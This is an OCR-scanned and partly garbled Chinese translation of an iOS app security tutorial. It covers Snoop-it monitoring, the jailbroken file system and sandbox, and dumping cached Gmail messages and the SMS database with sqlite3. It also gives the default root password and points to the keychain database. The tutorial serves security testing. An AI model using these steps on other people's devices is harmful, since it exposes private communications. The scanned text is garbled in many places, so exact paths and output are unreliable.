Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , <0x178530> 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , <0x178530> 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x172a80) touchesMoved:withEvent:], args: , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesMoved:withEvent:), , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesMoved:withEvent:], args: , <0x178530> 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesCancelled:withEvent:), , «0x178530» 
Wed Jul 17 16:35:00 2013 (Thread 0): - [AppDelegate(0x17aa80) touchesCancelled:withEvent:], args: , «0x178530» 
Wed Jul 17 16:35:01 2013 (Thread 0): - [AppDelegate(0x17aa80) application WillResignActive:], args: <0x178330> 
Wed Jul 17 16:35:04 2013 (Thread 0): - [AppDelegate(0x17aa80) performSelector:withObject:withObject:], args: @selector(touchesBegan:withEvent:), , <0x178530> a 
| [5] Debug Report Search : 


Wk 
WL 


Snoop-it 允 许 你 查看 哪些 文件 和 目录 目前 正 被 应 用 访问 。 为 了 达到 这 个 目的 ， 请 点 击 
Monitoring F @ 49 Filesystem. 这 个 功能 特别 有 用 ， 尤 其 是 当 应 用 正在 往 db 写 数据 的 时 候 ， 这 
个 功能 能 够 让 你 找 出 db 文件 的 名 字 。 你 也 可 以 双击 它们 ， 然 后 下 载 到 你 的 机 器 上 再 分 析 。 


4.6 Snoop-it 简 介 111 


Home Filesystem Keychain Network Sensitive API 
Filter: 
Filepath Filename NSFile Protection Class Tir 
!var/mobile/Applications/OFF01000-CEC1-451B-A793- : 5 : ] 
z 3 BD3618220E12/MethodSwizzlingDemo.app/en.Iproj'MainStoryboard.story boardc/ Info. plist NSFileProtectionNone 17.07. 
/var/mobile/Applications/OF F01000-CEC1-451B-A793- : i r , ; | 
* @ BD3616220E12/MethodSwizzlingDemo.app/en.IprojMainStoryboard.storyboardc! n EH Utm Tr id 
!var/mobile/Applications/OFF01000-CEC1-451B-A793- : : : : ] 
+ @ BD3616220E12/MethodSwizzlingDemo.app/en.Iproj/MainStoryboard.storyboardc/ 2-view-3.nib NSFileProtectionNone 17.07. 
* - /var/mobile/Applications/OF F01000-CEC1-451B-A793-BD3616220E12/MethodSwizzlingDemo.app/en.Iproj/ InfoPlist.strings NSFileProtectionNone 17.07. 
/var/mobile/Applications/OF - - - - /Met wiz zlingDemo.app/ et wizzlingDemo "ileProtectionNone .07.; 
* 'var/mobile/Applications/OF F01000-CEC 1-451B-A793-BD38616220E12/MethodSwizzlingD | MethodSwizzlingD NSFileP ionN 17.07 
* - !var/mobile/Applications/OFF01000-CEC1-451B-A793-BD3616220E12/MethodSwizzlingDemo.app/ MethodSwizzlingDemo NSFileProtectionNone 17.07. 
* =) !var/mobile/Applications/OFF01000-CEC1-451B-A793-BD3616220E12/MethodSwizzlingDemo.app/ MethodSwizzlingDemo NSF ileProtectionNone 17.07. 
* - /var/mobile/Applications/OF F01000-CEC1-451B-A7$3-BD3616220E12/MethodSwizzlingDemo.app! MethodSwizzlingDemo NSFileProtectionNone 17.07.) 


你 也 可 以 看 到 应 用 调用 的 敏 
UDID » T E TR 


感 API。 比 如 在 地 址 筹 查 找 信息 ， 访 问 camera， 或 者 访问 设备 的 
的 App Store 应 用 访问 的 敏感 API 


Home Sensitive API 


ID API Timestamp 
Addressbook (API) 
Addressbook (File) 
Addressbook (API) 
Addressbook (File) 


7/17/2013 10:33:42 PM 
7/17/2013 10:33:42 PM 
17.07.13 22:33:42 
17.07.13 22:33:42 


) = N 一 





Thread {name = = (null), r num = 126}, Dispatch queue: com. apple. root. . default-o overcommit- 
priority: 

0 libsystem_kernel.dylib Ox35898dc4 — open 

1 Foundation 0x37ab4a81 -[NSThread main] + 72 

2 Foundation 0x37b48591 — NSThread__main__ + 1048 

3libsystem c.dylib 0x30a84735 pthread start + 320 

4 libsystem_c.dylib 0x30a845f0 thread start + 8 








我 们 也 可 以 看 到 这 个 应 用 存在 keychain 的 所 有 信息 。 它 也 会 列 出 NS 
访问 的 HTTP 请 求 。 这 两 个 功能 都 可 以 在 monitoring 下 面 看 到 。 我 把 这 些 功能 留 给 读者 你 去 
试 。 我 们 将 在 另 一 篇 文章 中 介绍 如 何 从 keychain 中 dump 出 数据 。 


你 会 很 高 兴 的 知道 Snoop-it 有 公共 的 API， 所 以 我 们 能 够 利用 它 来 编写 自动 化 测试 或 者 编写 我 
们 自己 的 用 户 界 面 。 关 于 XML-RPC web service API 的 文档 可 以 在 官网 找到 。 


总 结 
本 文 我 们 学 习 了 如 何 使 用 Snoop-it 来 进 于 时 分 析 和 对 iOS apps3t Z S 364 E © 
Snoop-it 离 发 布 还 有 几 个 星期 的 时 间 ， - iip 样 向 作者 发 邮件 索要 beta 版 本 。 有 
一 个 我 特别 想 要 Snoop-it 添 加 的 功能 就 是 执行 Method Swizzling。 我 确信 Snoop-it 对 于 任何 对 
iOS 应 用 的 安全 分 析 感 兴趣 的 人 都 是 一 个 好 工具 ， 并 且 它 会 变 得 越 来 越 好 。 


(i: 已 经 发 布 了 ， 可 以 在 Cydia 上 下 载 ， 需 要 先 添加 源 ， 具 体 参 见 其 官方 网 站 ) 


KX XÆ http://wufawei.com/2013/11/ios-application-security-9/ 


#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


本 章 我 们 介绍 了 iOS 设 备 如 何 越狱 和 搭建 渗透 移动 测试 环境 ， 并 简要 介绍 了 如 何 安装 GDG 和 
Cycript 等 工具 ， 后 面 会 对 其 用 法 进行 更 详细 的 介绍 。 


#4 iOS 设 备 上 的 工具 下 的 更 多 文章 


iOS & M $$ B DAT 


引号 


我 们 将 在 本 文 分 析 iOS 的 文件 系统 ， 了 解 其 目录 是 如 何 组 织 的 ， 查 看 一 些 重要 的 文件 ， 然 后 
看 如 何 才 能 够 从 数据 库 文件 和 plist 文 件 导出 数据 。 我 们 将 学 习 应 用 是 如 何在 特定 目录 GPS) 
内 存放 数据 的 ， 以 及 怎样 才能 提取 这 些 数据 。 


有 一 个 很 重要 的 事情 需要 注意 ， 在 前 面 的 文章 中 ， 我 们 都 是 以 root 身 份 登录 进 设备 的 。 设 备 上 
有 另 一 个 用 户 名 叫 mobile, 一 个 mobile 用 户 拥有 的 权限 是 少 于 root 用 户 的 。 除 了 Cydia 和 少数 的 
应 用 以 root 权 限 应 用 之 外 ， 其 他 应 用 都 是 以 mobile 的 身份 应 用 的 。 有 些 苹果 内 部 的 daemon 服 
务 也 以 root 权 限 运 行 。 执 行 ps aux 就 可 以 查看 清楚 。 在 最 左边 ， 我 们 可 以 看 到 用 户 列 。 可 以 看 
到 Cydia 以 root 身 份 运 行 ， 所 有 其 他 应 用 都 以 mobile 身 份 运 行 ， 例 

AAA NEAS pp ITE Appia plore ， 有 些 demon 也 以 root 身 份 运 行 ， 如 /usr/sbin/wifid ° 
一 些 你 通过 Cydia 安 装 的 应 用 也 可 能 会 以 root 身 份 运行 。 一旦 你 的 设备 一 越狱 ， 默 认 root 和 
mobile 49 # 44 4f z& alpine. 


Prateeks-iPod:- root# ps aux 
USER PID «CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND 


root 21 1.2 0.5 294880 1372 ?? Ss Mon®4PM 0:49.39 /usr/sbin/wifid 

mobile 59 1.1 11.4 460144 28948 T? Ss Mon04PM 10:56.14 /System/Library/CoreServices/SpringBoard.app/SpringBoard 

root 2191 0.7 90.4 273932 1092 s000 Ss 4:00PM 0:00.05 -sh 

root 2190 0.3 0.6 274820 1424 TU S 4:00PM 0:00.29 sshd: rootettys000 

root 19 0.1 6.6 296032 1456 1? Ss Mon84PM 8:51.43 /usr/libexec/UserEventAgent -l System 

root 1 0.1 6.3 274100 732 ?? Ss Mon®4PM 0:14.69 /sbin/ launchd 

mobile 2083 0.0 0.2 274208 528 TAN S 3:41PM 0:00.16 /usr/libexec/afcd --lockdown -d /var/mobile/Media -u mobile 

mobile 2078 0.0 20.1 272868 340 i S 3:41PM 0:00.02 /usr/libexec/syslog relay --lockdown 

mobile 2076 0.0 0.2 274612 416 ?7? S 3:41PM 0:00.02 /usr/libexec/notification proxy 

mobile 2074 0.0 0.2 274612 416 M. 3:41PM 0:00.02 /usr/libexec/notification proxy 

mobile 2070 0.0 0.1 272868 344 tf dE 3:41PM 0:00.03 /usr/libexec/syslog relay --lockdown 

mobile 2061 0.0 0.9 308044 2340 ?? Ss 3:41PM 0:01.61 /usr/libexec/ptpd -t usb 

mobile 1672 0.0 2.8 356344 7260 ?? Ss Wed@1PM 0:02.79 /Applications/MobileTimer.app/MobileTimer 

mobile 1315 8.0 4.9 419588 12380 ?? Ss Tue87PM 8:09.76 /Applications/MobileSafari.app/MobileSafari 

mobile 1077 0.0 2.0 352904 5080 ?? Ss Tue85PM 0:03.35 /Applications/MobileSlideShow.app/MobileSlideShow 

mobile 384 0.0 7.9 428568 20140 TT SB Mon85PM 2:56.75 /Applications/AppStore.app/AppStore 

mobile 275 0.0 3.0 362112 7632 ?? Ss Mon®4PM 0:08.09 /Applications/Snoop-it Config.app/Snoop-it Config 

root 228 0.0 0.2 274924 540 ?? Ss Mon®4PM 0:05.46 /System/Library/Frameworks/SystemConfiguration.framework/SCHelper 

mobile 227 0.0 1.9 354352 4836 ?? Ss Mon®4PM 0:04.77 /Applications/Preferences.app/Preferences 

mobile 226 0.0 1.9 361768 4728 1? Ss Mon84PM 8:37.14 /Applications/MobileMail.app/MobileMail 

mobile 223 0.8 1.5 349164 3916 1? Ss Mon84PM 0:08.71 /Applications/MobilePhone.app/MobilePhone 

root 115 0.0 0.3 276172 872 ?? Ss Mon84PM 0:10.05 /usr/sbin/notifyd 

mobile 56 0.0 20.7 305852 1868 1? Ss Mon®4PM 0:01.64 /usr/sbin/aosnotifyd 

mobile 55 0.0 08.6 279024 1600 ?? Ss Mon®4PM 0:08.73 /usr/sbin/BTServer 

_wireless 64 8.0 @.5 287236 1352 ?? Ss Mon®4PM 0:04.84 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic 
mobile 58 0.0 0.6 303744 1452 NM AN Mon84PM 8:30.45 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated 
mobile 57 0.0 0.5 294132 1304 1? Ss Mon84PM 8:19.20 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd 

root 53 0.0 0.6 278652 1464 ?? Ss Mon®4PM 0:40.87 /usr/libexec/configd 

mobile 50 8.8 1.5 314012 3740 77 ‘Ss Mon®4PM 0:09.00 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd 
mobile 49 0.0 0.6 281944 1652 ie 5 Mon®4PM 0:05.78 /usr/sbin/fairplayd.N81 

root 48 0.0 0.3 274716 720 ?? Ss Mon®4PM 0:02.91 /usr/libexec/fseventsd 

mobile 46 0.0 0.8 298468 2140 ?? Ss Mon®4PM 0:11.55 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd 

mobile 45 0.0 0.6 305260 1588 7? Ss Mon®4PM 0:04.34 /System/Library/PrivateFrameworks/IMCore. framework/imagent.app/imagent 
root 43 0.0 1.3 315000 3272 ?? Ss Mon®4PM 0:41.61 /usr/libexec/locationd 

.mdnsresponder 42 0.0 0.4 275860 1072 ?? Ss Mon®4PM 0:20.40 /usr/sbin/mDNSResponder -launchd 

mobile 41 0.0 0.6 294492 1404 ?? Ss Mon84PM 0:00.94 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted 
mobile 40 09.0 1.7 318756 4212 1? Ss Mon®4PM 0:38.43 /usr/sbin/mediaserverd 

root 2194 0.0 0.1 272928 364 s000 R+ 4:00PM 0:00.01 ps aux 

root 27 0.0 0.2 293784 608 ?? Ss Mon®4PM 0:41.98 /System/Library/CoreServices/powerd.bundle/powerd 

root 25 6.6 0.3 275628 704 ?? Ss Mon®4PM 0:13.13 /usr/sbin/syslogd 

root 34 0.0 0.4 295552 1072 T? Us Mon84PM 0:22.41 /usr/libexec/lockdownd 

root 2188 0.0 0.2 272888 392 If SE 4:00PM 8:00.02 /usr/libexec/launchproxy /usr/sbin/sshd -i 

mobile 2170 6.0 6.7 294064 1872 ?? Ss 3:58PM 0:00.30 /System/Library/PrivateFrameworks/SyncedDefaults.framework/Support/syncdefaultsd 
mobile 2093 0.0 0.2 274612 416 Th = 3:42PM 0:00.11 /usr/libexec/notification proxy 

mobile 2085 0.8 1.1 306224 2852 ?? Ss 3:41PM 0:01.80 /usr/libexec/atc 

mobile 2084 0.0 0.2 274612 404 77 S 3:41PM 0:00.01 /usr/libexec/notification proxy 

Prateeks-iPod:- root 


= 


可 以 配置 一 个 应 用 以 root 权 限 运 行 。 你 可 以 看 看 Stack Overflow 上 的 过 篇 文章 来 了 解 更 多 细 


+- 


P o 


我 们 ssh 进 设备 。 到 /Applications 目 录 。 你 可 以 在 该 文件 夹 下 看 到 一 些 应 用 。 它 们 中 的 大 多 是 
都 是 OS 预 装 的 ， 有 些 应 用 是 通过 Cydia 安 装 的 ， 比 如 Ternimal 应 用 。 请 注意 ， 所 有 运行 

在 /Applications 的 应 用 并 不 运行 在 沙 盒 环 境 ， 而 所 有 在 /varmobile/Applications 目 录 下 的 应 
都 运行 在 一 个 沙 金 环境 下 。 文 章 后 面 会 讨论 沙 金 。 不 过 ， 它 们 默认 依然 以 mobile 用 户 运行 ， 
除非 专门 做 了 配置 


Prateeks-iPod:/ root# ls 
Applicationse MAGH Facebook-Cracked/ Library/ System/ User@ bin/ boot/ 
Prateeks-iPod:/ root# cd Applications 


TED dev/ etc@ Lib/ mnt/ private/ sbin/ temp/ tmp@ usr/ var 
Prateeks-iPod:/Applications root# ls 
AdSheet.app/ Contacts-iphone.app/ 
AppCake3.app/ Cydia.app/ 

AppStore.app/ DemoApp.app/ 
Calculator.app/ FileViewer.app/ 
Camera.app/ GameX Center-iphone.app/ 
Prateeks-iPod:/Applications root# 


Terminal.app/ 
TrustMe.app/ 
Utilities/ 
Videos.app/ 
VoiceMemos.app, 


Reminders.app/ 
Respring.app/ 
Setup.app/ 

Snoop-itX Config.app/ 
Stocks.app/ 


MobileStore.app/ 
MobileTimer.app/ 
Music-iphone.app/ 
Nike.app/ 
Preferences.app/ 


MobileNotes.app/ 
MobilePhone.app/ 
MobileSMS.app/ 
MobileSafari.app/ 
MobileSlideShow.app/ 


HelloWorld.app/ 
Installous.app/ 
Maps~iphone.app/ 
MobileCal.app/ 
MobileMail.app/ 


所 有 从 App Store F 3i $5 & M TINH 目录 。 这 个 目录 也 包含 用 installipa 
或 者 其 他 外 部 源 如 Cydia 安 装 的 应 用 。 所 有 这 些 应 用 都 运行 在 沙 盒 环境 下 。 


Prateeks-iPod:/ root# cd /private/var/mobile/Applications/ 
Prateeks-iPod:/private/var/mobile/Applications root# ls 
013D223D-3546-420D-B9A4-25E538EO0E60E/  1B1C39EF-EA0E-4DB3-9458-9D092008672B/ 
0759F7BE-9038-4B48-910C-04DD1C25F6A3/  25B6D942-FCA5-489D-A83C-BFD6381B4C30/ 


535B0F2F-0A7F-4CA2-8903-C9365C546F22/ 
72581630-F432-403D-8A5C-0679FC7D3190/ 


A209041E-ACAE-4AFD-80C7-D017A9B7D425/ 
A8D94849-C64B-4C06-B78A-BC1bE2B44F244/ 


D4C8923D-73F2-4D3E-97F1-0FBDC606D355/ 
D57D626C-A899-4760-99FF-352E42CE5874/ 


0A26D55D-E3B9-4021-AC74-95CE7A6FAB8C2/ 
0B1F2EDB-A94D-4EF4-920C-751A23C82468/ 
0C3B8323-91FE-4420-B424-58856AA10825/ 
0C933D02-9E46-42B0-9B76-516AAGFFE9BF/ 
OFD688FF-F587-426F-8A62-5F1ClABCEDEB/ 
OFF01000-CEC1-451B-A793-BD3616220E12/ 
1332F885-99B9-4041-B483-A0FB63FAD105/ 


281DAADF-793E-416B-B971-A5B251A1A9A0/ 
2A0093CE-8A92-49BD-AF68-E50B0A4DA9E4/ 
2E85455B-C89D-4ED4-ACBE-C8746BC850C7/ 
3D6AFD80-3B43-4696-B7F7-48B1E6967EBC/ 
3E24EA16-B2D9-4C71-8F0D-A01C1332AB35/ 
41A20265-21A7-4F0A-8547-ACFCA435D684/ 
434EBFD0-3A3C-43AD-B7C7-DB784DFCDAA9/ 


72D31236-6C91-4A6C-AAAC-D05D6A23E663/ 
73351C65-5DEC-4B52-B06A-D8122C074EB1/ 
7FBADD66-81D8-484A-A148-CDE48B469A69/ 
83470B09-2DD8-4E64-9BA7-302172544E99/ 
86D24B90-BC17-4B1A-B64F-20CFD9176262/ 
9068A5E0-7ADB-4DBB-8FC3-18821C37E7E6/ 
9CA286D5-F7A9-4E1D-A9FD-6DB9D4DC730D/ 


A91FA08D-AGEF-429E-BEAF-2D23B0031D31/ 
AA997C0D-9170-4350-887A-234229BFA34C/ 
AE643857-F39B-4529-B51B-9E5A7533C0E7/ 
B3D09A9B-7A79-47E4-B89D-3A04A0353391/ 
D1CEA977-87C4-4D42-8550-816C41F73D75/ 
D3087CB8-746A-4A63-9682-B1CB9EF7DCB8/ 
D395D7E0-7676-449E-ADC5-529A27B89BDD/ 


D944881B-7D4B-497F-8656-BAA7B6DFE83C/ 
DE42bE795-50BF-4F02-9989-CF24E0865998/ 
EA840FEE-0178-4951-8706-3A3CC2C52A6F/ 
F061385F-EBE4-4C7A-8BB7-6B76B2DF3852/ 
F4C63958-B6EF-4908-91F9-6A36F6A51667/ 
F95EDAF9-BB74-4D04-A94A-ACFF649F0B46/ 
class-info-Prateek 


Prateeks-iPod:/private/var/mobile/Applications root# ls * 
class-info-Prateek 


013D223D-3546-420D-B9A4-25E538EOQE60E: 
Documents/  GeoDoIt.app/ Library/ iTunesArtwork iTunesMetadata.plist  tmp/ 


0759F7BE-9038-4B48-910C-04DD1C25F6A3: 
Documents/  Library/ kjnk.app/ tmp/ 


0A26D55D-E3B9-4021-AC74-95CE7A6FAB8C2: 
Documents/ Library/ jsa.app/ tmp/ 





， 从 iOS4 及 以 后 ， 每 个 应 用 都 驻 留 的 环境 叫做 沙 
允许 应 用 访问 它 
访问 用 户 某 些 特 定 的 用 户 数 据 的 。 例 如 要 用 户 人 允许 去 访问 联系 人 ， 有 照片 等 等 。 不 ; 
也 有 不 少 和 争论 。 例如 从 iOS6 开 始 ， 应 用 在 得 到 用 户 CN 访问 用 户 的 联系 人 。 aes 
应 用 不 需要 获得 任何 权限 就 能 访问 用 户 的 联系 人 ， 这 导致 了 较 大 的 争议， 例如 Path 应 


使 (Sandbox)。 这 样 做 的 主要 目的 是 不 
自己 沙 盒 外 的 任何 数据 。 这 样 做 会 更 安全 。 不 过 ， 应 用 用 合适 oe 


等 等 。 不 过 ， 对 这 


\ 主 、、 立 
TH (Ex 


WI 


用 o 


i8 xt 4$ A] Entitlements > f *T A32 I9] 29 S 7p 8 E k E o ART yAdEGEGE €] o Mdo > BIR 
得 一 个 用 户 的 calender 的 读 权 限 ，.entitlements 文 件 中 的 entitlement key 


com.apple.security.personal-information.calendars 必 须 标 志 为 YES ° 


让 我 们 看 看 某 个 特定 应 用 的 目录 结构 。 首 先 到 Snapchat 的 目录 看 看 。 对 于 所 有 应 用 都 是 类 似 
的 结构 。 


Prateeks-iPod:/private/var/mabile/Applications root£ cd S89B58BA5EB-7ADB-ADBB-8FC3-18821C37E7E6 
Prateeks-iPod:/private/var/mabile/Applications/B58868A5EB-7ADB-ADBB-BFC3-18821C37E7EB root#® ls 
Documents/ Library/ Snapchat.app/ iTunesArtwork  iTunesMetadata.plist  tmp/ 

Prateeks-iPod:/private/var/mabile/Applications/BB86568AS5EB-7ADB-ADBB-BFC3-18821C37E7EB5 root£ E 


e Snapchat.app( 应 用 名 称 .app) 文 件 夹 包 含 所 有 的 资源 文件 (images)，plist 文 件 和 应 用 的 二 
进 制 文件 。 

e Documents 目 录用 于 存放 任意 文件 。 相 对 于 应 用 文件 来 说 ， 这 提 
访问 的 单独 目录 。 下 面 是 从 苹果 文档 中 摘录 的 一 名 话 。 


"把 用 户 数据 放 到 /Documents/。 用 户 数据 是 你 的 应 用 不 能 再 创建 的 任意 数据 ， 比 如 用 户 的 文 


档 或 者 任何 其 它 用 户 产生 的 内 容 * 。 


e tmp 文 件 夹 用 于 存放 用 户 的 临时 数据 。 应 用 的 开发 者 有 责任 释放 被 改 文件 夹 占有 的 内 存 . 
e Library 文 件 夹 可 以 用 来 保存 那些 不 是 用 户 数据 的 文件 。 


你 可 以 从 下 面 的 蔷 果 文档 的 截图 知道 更 多 信息 。 


iOS 24 Wiki 


e Handle support files—files your application downloads or generates and can recreate as needed—in one of two ways: 
a [n iOS 5.0 and earlier, put support files in the «Application Home» /Library/Caches directory to prevent them from being backed up 


a In iOS 5.0.1 and later, put support files in the «Application Home»/Library/Application Support directory and apply the com. apple.MobileBackup extended attribute 
to them. This attribute prevents the files from being backed up to iTunes or iCloud. If you have a large number of support files, you may store them in a custom subdirectory 
and apply the extended attribute to just the directory. 


e Put data cache files in the «Application Home» /1.ibrary/Caches directory. Examples of files you should put in this directory include (but are not limited to) database cache files 
and downloadable content, such as that used by magazine, newspaper, and map apps. Your app should be able to gracefully handle situations where cached data is deleted by the 
system to free up disk space. 
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人 数据 库 中 收集 信息 


gaa 了 很 多 信息 。 这 些 数据 库 数据 库 通常 以 .db 或 者 .sqlitedb 结 尾 。 对 于 开发 
者 来 说 ， 许 多 功能 比如 Core Data，NSUserDefaults 都 从 一 个 较 低 ve 次 操作 这 些 sqlite 数 据 
库 。 en 用 ， 甚 至 操作 系统 级 别 的 许多 信息 。 可 能 包括 电话 历史 
或 者 应 用 内 保存 的 邮件 等 等 。 要 找到 所 有 的 .db 文件 ， 可 以 用 命令 find . -name *.db 


Prateeks-iPod:/ root# find . -name x.db 


-/Library/Application Support/BTServer/pincode, defaults.db 

. /5ystem/Library/Frameworks/CoreLocation, framework/Support/factory. db 
,/System/Library/Frameworks/CoreLocation.framework/Support/timezone,.db 
./System/Library/Frameworks/CoreTelephony. f ramework/Support/lasd.db 
./System/Library/Frameworks/CoreTelephony. f ramework/Support /plmn. db 
 /System/Library/PrivateFrameworks/AppSupport., framework/CityInfo.db 
 /System/Library/PrivateFrameworks/AppSupport, framework/Dutch. lproj/Localizable Places.db 
. /System/Library/PrivateFrameworks/AppSupport.framework/English.lproj/Localizable Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/French. lproj/Localizable Places.db 
 /5ystem/Library/PrivateFrameworks/AppSupport., f ramework/German. lproj /Localizable, Places.db 
. /System/Library/PrivateFrameworks/AppSupport. f ramework/Italian,lproj/Localizable Places.db 
/System/Library/PrivateFrameworks/AppSupport. framework/Japanese.lproj/Localizable Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/Spanish. lproj/Localizable_Places. db 
-/System/Library/PrivateFrameworks/AppSupport. framework/ar. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/ca. lproj/Localizable_Places.db 
 /5ystem/Library/PrivateFrameworks/AppSupport, framework/calldata. db 
./System/Library/PrivateFrameworks/AppSupport. framework/cs.lproj/Localizable Places.db 

, /System/Library/PrivateFrameworks/AppSupport, framework/da. lproj/Localizable Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/el. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/en_GB. lproj/Localizable_Places.db 
. /System/Library/PrivateFrameworks/AppSupport, framework/fi.lproj/Localizable_Places.db 

. /System/Library/PrivateFrameworks/AppSupport.framework/he.lproj/Localizable Places.db 
./System/Library/PrivateF rameworks/AppSupport. framework/hr.lproj/Localizable Places.db 

. /System/Library/PrivateFrameworks/AppSupport. framework/hu. lproj/Localizable Places.db 
./System/Library/PrivateFrameworks/AppSupport. f ramework/id.lproj/Localizable,Places.db 
/5ysten/Library/PrivateFrameworks/AppSupport, framework/ko. lproj/Localizable Places.db 
./System/Library/PrivateFrameworks/AppSupport, framework/ms. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/no. lproj/Localizable_Places.db 

. /System/Library/PrivateFrameworks/AppSupport. framework/pl.lproj/Localizable Places.db 

. /System/Library/PrivateFrameworks/AppSupport. framework/pt. lproj/Localizable_Places.db 
 /5ystem/Library/PrivateFrameworks/AppSupport. framework/pt_PT. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/ro. lproj/Localizable_Places.db 
-/System/Library/PrivateF rameworks/AppSupport. framework/ru. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/sk. lproj/Localizable_Places.db 

. /System/Library/PrivateF rameworks/AppSupport. framework/sv. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport. framework/th. lproj/Localizable_Places.db 

. /System/Library/PrivateFrameworks/AppSupport. framework/tr. lproj/Localizable_Places.db 
./System/Library/PrivateF rameworks/AppSupport. f ramework/uk. lproj/Localizable_Places.db 
./5ystem/Library/PrivateFrameworks/AppSupport, framework/vi.lproj/Localizable Places.db 
/System/Library/PrivateFrameworks/AppSupport, framework/zh, CN. lproj/Localizable_Places.db 
./System/Library/PrivateFrameworks/AppSupport.framework/zh TW.lproj/Localizable Places.db 
, /private/var/Keychains/keychain-2.db 

./private/var/db/ launchd. db 


你 可 以 得 到 在 设备 上 保存 的 所 有 数据 库 文件 。 让 我 们 先 看 下 其 中 的 一 些 重 要 数据 库 文件 。 


我 在 设备 上 安装 了 gmail 应 用 。 下 面 这 个 文件 对 我 来 说 看 起 来 很 有 趣 。 
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看 起 来 这 个 文件 包含 了 一 些 重要 的 信息 。 让 我 们 先 用 sqlite 客 户 端 分 析 一 下 这 个 文件 。 


se 请 
意 ， 你 需要 在 你 的 设备 上 安装 Sqlite 客 户 端 ， 比 如 sqlite3。 我 们 先 打 开设 备 ， 然 后 用 命令 
sqlite3 fle_name 打 开 数 据 库 文件 。 


prateeks -iPod: / root# sqlite3 ./private/var/mobile/Applications/AS81FA88D-AG6EF-429E-BEAF-2D23B0031D31/Library/Caches/https mail.google.com 0/0000000000000001. dbi 


请 注意 ， 你 会 得 到 一 个 sqlite 解 释 器 。 让 我 们 打开 headers， 这 样 我 们 就 可 以 看 到 所 有 的 列表 
名 称 。 你 可 以 用 .tables 命 令 看 看 数据 库存 放 的 所 有 表 。 


Prateeks-iPod:/ root# sqLite3 ./private/var/mobile/Applications/A91FA08D-AG6EF-429E-BEAF-2D23B0031D31/Library/Caches/https mail.google.com 0/0000000000000001.db 
SQLite version 3.7.7 

Enter ".help" for instructions 

sqlite> .headers on 

sqlite> .tables 


..MWebKitDatabaseInfoTable | cached messages 
action queue 32 cached queries 
cached contacts config, table 
cached conversation headers hit to data 
cached labels log store 
sqlite> B 


有 些 表 看 起 来 很 有 趣 > MINER cached queries 和 cached messages ° iE 4 
们 从 cached messages 导出 所 有 信息 


sqlite> select * from cached messages; 
messageld|conversationId|activityId|isUnread|isStarred|isInbox|isSpam|isTrash|isMuted|isPhishy]isDraft|isActivity|isMInbox|personallevel|subject|snippetHtml|address aa plian ,tojaddres s cc|address bcc 
address replyTo|receivedDateMs|body|isClipped|attachments|hasExternallmages |hasStrippedExternallmages|imagesAlwaysDisplayed|uploadedAttachments|localUpdatellast^ction|orinins?" IdlentityRefId|spamMe 


正如 我 们 看 到 的 那样 ， 导 出 了 所 有 缓存 了 的 邮件 。 


类 似 的 ， 我 们 也 可 以 导出 所 有 的 短信 (SMS) 数据 库 ， 位 于 /private/varmobile/Library/SMS 
你 可 以 从 导出 文件 中 看 到 一 条 消息 ， 其 文本 是 Test message for ios security tutorial 


Prateeks-iPod:/ root# sqlite3 ./private/var/mobile/Library/SMS/sms.db 

SQLite version 3.7.7 

Enter ".help" for instructions 

sqlite> .headers on 

sqlite> .tables 

_SqliteDatabaseProperties message 

group_member msg. group 

madrid attachment msg pieces 

madrid chat 

sqlite> select * from message; 

ROWID|address|date|text|flags|replace|svc center|group. id|association id|height|UIFlags|version|subject|country|headers|recipients|read|madrid attributedBody|madrid handle|madrid, version|madrid guid|madri 
d type|[madrid roomname|madrid service|madrid account|madrid account guid|madrid flags|madrid attachmentInfo|madrid url|madrid error|is madrid|madrid date read|madrid date delivered 
24||390691739| ld a hd dl i 


482757CE5D66|5| 
streamtyped???7@?7??NSArray||22|1|0|0 

25||395321680|Test message for ios security tutorial |0/0||0|/0|0/0|0|||||9| 
streamtyped???Ge???NSMutableAttributedString|prateek.searchingeye&Ggmail.com|0|BFBEC95F-454E-4303-88DF-A00A0A70F17F |0| |Madrid|e:pr 

ateek.searchingeyeGgmail.com|4F538C6B-1167-493F-8840-482757CE5D66|36869|||0|1|0|395321682 

26||395321677|Test message for ios security tutorial ]0[80[[|0|0[|0|0|0||]|]||0]| 
streamtyped???G???NSMutableAttributedString|prateek.searchingeye&gmail.com|0|E93DDC62-714D-496F-B2bE0-AF5439A7D10E|0| |Madrid|e:pr 

